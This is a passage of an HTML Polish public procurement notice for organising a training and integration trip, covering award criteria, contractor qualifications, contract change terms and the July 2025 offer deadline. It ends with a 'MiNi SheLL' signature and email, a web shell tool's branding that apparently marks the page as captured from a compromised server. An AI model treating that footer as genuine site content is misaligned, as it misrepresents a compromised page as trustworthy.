class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin na zgłoszenie przez Zamawiającego ostatecznej liczby uczestników wyjazdu integracyjno-szkoleniowego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> określone warunki udziału w postępowaniu:<br/>1)	W zakresie kompetencji lub uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>-Zamawiający uzna, że Wykonawca spełnia ww. warunek, jeśli Wykonawca będzie wpisany do rejestru organizatorów turystyki i pośredników turystycznych prowadzonego przez właściwego Marszałka Województwa zgodnie z ustawą z dnia 24.11.2017 r. o imprezach turystycznych i powiązanych usługach turystycznych (t.j. Dz.U. z 2023 r., poz. 2211 z późn. zm.)<br/>2)	W zakresie zdolności do występowania w obrocie gospodarczym: <br/>- Wykonawca spełni warunek, jeżeli posiada wpis do właściwego rejestru sądowego lub centralnej ewidencji i informacji o działalności gospodarczej;<br/>3)	W zakresie sytuacji ekonomicznej lub finansowej: <br/>- Zamawiający nie określa warunku w tym zakresie.<br/>4)	W zakresie zdolności technicznej lub zawodowej: <br/>- o udzielenie zamówienia może ubiegać się Wykonawca, który posiada odpowiednie doświadczenie, tj. który w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej dwie usługi, w ramach jednej lub większej liczby umów (kontraktów), zbliżone przedmiotowo do niniejszego przedmiotu zamówienia, tj. każda usługa polegająca na zorganizowaniu co najmniej dwudniowego wyjazdudla grupy nie mniejszej niż 70 osób, w skład której to usługi wchodziło co najmniej zapewnienie: transportu, zakwaterowania, wyżywienia, przeprowadzenia warsztatów lub szkoleń. Warunek zostanie zweryfikowany na podstawie załącznika nr 9 do SWZ; <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie składane na podstawie art. 125 ust. 1 ustawy Pzp uwzględniające przesłanki wykluczenia z art. 7 ust. 1 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Oświadczenie wykonawcy, zgodnie z pkt. 3.3 ppkt. 1) według wzoru stanowiącego załącznik nr 2 do SWZ.<br/>W przypadku składania oferty wspólnej ww. oświadczenie	składa każdy z wykonawców składających ofertę wspólną. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu lub kryteriów selekcji w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w ppkt 1) powyżej, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy.<br/>4. dokumenty, z których wynika prawo do podpisania oferty; odpowiednie pełnomocnictwa;<br/>5. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa w ppkt 1) powyżej, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby, zgodnie z pkt 3.2 SWZ. wg treści załącznika nr 4 do SWZ.<br/>6. Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów z innym Wykonawcą, który złożył odrębną ofertę albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej – Załącznik nr 3 do SWZ. Zamawiający wezwie do złożenia oświadczenia jeśli w niniejszym postępowaniu wpłynie więcej niż jedna oferta.<br/>7.	Aktualny wpis do rejestru organizatorów turystyki i pośredników turystycznych prowadzonego przez właściwego Marszałka Województwa zgodnie z ustawą z dnia 24.11.2017 r. o imprezach turystycznych i powiązanych usługach turystycznych (t.j. Dz.U. z 2023 r., poz. 2211 z późn. zm.)<br/>8.	Wykaz usług, o którym mowa w pkt. 3.2 ppkt 4) SWZ.<br/>9. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 6.2. ppkt 2) zastępuje się je w całości lub w części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Wypełniony formularz oferty cenowej, według wzoru stanowiącego załącznik nr 1 do SWZ.<br/>W przypadku składania oferty wspólnej należy złożyć jeden wspólny formularz podpisany przez pełnomocnika.<br/>2.	Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które zamawiający posiada, jeżeli Wykonawca wskaże te środki oraz potwierdzi ich prawidłowość <br/>i aktualność.<br/>3	W zakresie nieuregulowanym ustawą Pzp lub niniejszą SWZ do oświadczeń i dokumentów składanych przez Wykonawcę w postępowaniu zastosowanie mają w szczególności przepisy rozporządzenia Ministra Rozwoju Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń (t.j. Dz.U. z 2023 r., poz.1824), jakich może żądać zamawiający od wykonawcy oraz rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020 r., poz. 2452 z późn. zm.) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zgodnie z art. 455 ust. 1 pkt 1 ustawy Pzp Zamawiający przewiduje możliwość zmiany Umowy:<br/>1)	gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia; <br/>2)	gdy konieczność wprowadzenia zmian będzie następstwem zmian organizacyjnych po stronie Zamawiającego, w tym w szczególności w jego strukturze organizacyjnej; <br/>3)	gdy wynikną rozbieżności lub niejasności w Umowie, których nie można będzie usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie Umowy w celu jednoznacznej interpretacji jej postanowień; <br/>4)	w przypadku działania siły wyższej tj. niezwykłych i nieprzewidzianych okoliczności niezależnych od Strony, która się na nie powołuje i których konsekwencji, mimo zachowania należytej staranności, nie można było przewidzieć przed wszczęciem postępowania <br/>o udzielenie zamówienia publicznego. W takim przypadku termin realizacji przedmiotu Umowy zostanie przesunięty o czas, w którym jego realizacja nie mogła być prowadzona; <br/>5)	w przypadku dokonania określonych czynności lub ich zaniechania przez organy administracji państwowej, w tym organy administracji rządowej, samorządowej, jak również organów <br/>i podmiotów, których działalność wymaga wydania jakiejkolwiek decyzji o charakterze administracyjnym w trakcie wykonywania przedmiotu Umowy; <br/>6)	istotnych problemów finansowych, ekonomicznych lub organizacyjnych Wykonawcy, producenta lub dystrybutora uzasadniających ryzyko, że jego produkty lub świadczenia mogą nie zostać należycie wykonane lub nie będą miały odpowiedniej jakości albo wsparcia <br/>w przyszłości; <br/>7)	uzasadnionych przyczyn technicznych lub funkcjonalnych powodujących konieczność zmiany sposobu wykonania Umowy; <br/>8)	przypadku, kiedy konieczność zmiany Umowy spowodowana jest okolicznościami, których Zamawiający, działając z należytą starannością, nie mógł przewidzieć a wartość zmiany nie przekracza 10% wartości zamówienia określonej pierwotnie w Umowie. Zmiana dokonana zgodnie z niniejszym postanowieniem, niezależnie od jej wartości, nie może prowadzić do zmiany charakteru Umowy, w szczególności do zastąpienia przedmiotu Umowy innego rodzaju przedmiotem. <br/>2.	Przewiduje się możliwość dokonania zmian postanowień zawartej Umowy na warunkach określonych w następujących przypadkach: <br/>1)	w przypadku uzgodnionej przez Strony zmiany terminu organizacji wydarzenia, <br/>2)	w przypadku uzgodnionego przez Strony, zwiększenia lub zmniejszenia liczby uczestników wydarzenia o więcej niż +/- 10 osób, <br/>3)	w przypadku uzgodnionej przez Strony zmiany miejsca organizacji wydarzenia, z zachowaniem standardu i wyposażenia obiektu zgodnie z Opisem Przedmiotu zamówienia. <br/>Pozostałe informacje znajdują się w załączniku nr 7 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-07-28 14:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Postępowanie prowadzone jest w formie elektronicznej za pośrednictwem Platformy e-Zamówienia (zw. dalej: „Platforma”), która jest dostępna pod adresem https://ezamowienia.gov.pl . Link prowadzący bezpośrednio do widoku postępowania na Platformie https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-57379e00-bfc3-4b28-8ea7-1db7d95b6ae2</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-07-28 14:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com